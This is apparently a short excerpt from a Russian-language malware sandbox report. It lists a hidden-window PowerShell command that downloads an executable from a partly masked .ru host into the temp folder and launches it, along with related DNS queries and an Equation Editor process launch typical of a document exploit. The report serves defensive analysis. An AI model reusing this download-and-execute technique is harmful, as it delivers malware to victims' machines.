Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$aMJao=$env:temp+'\vos.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://s2####4.smrtp.ru/a/mi.exe' -Destination $aMJao;(New-Object -com Shell.Application).S...
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- DNS ASK s2####4.smrtp.ru
- DNS ASK oc##.#tartssl.com
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$aMJao=$env:temp+'\vos.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://s2####4.smrtp.ru/a/mi.exe' -Destination $aMJao;(New-Object -com Shell.Application).S...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding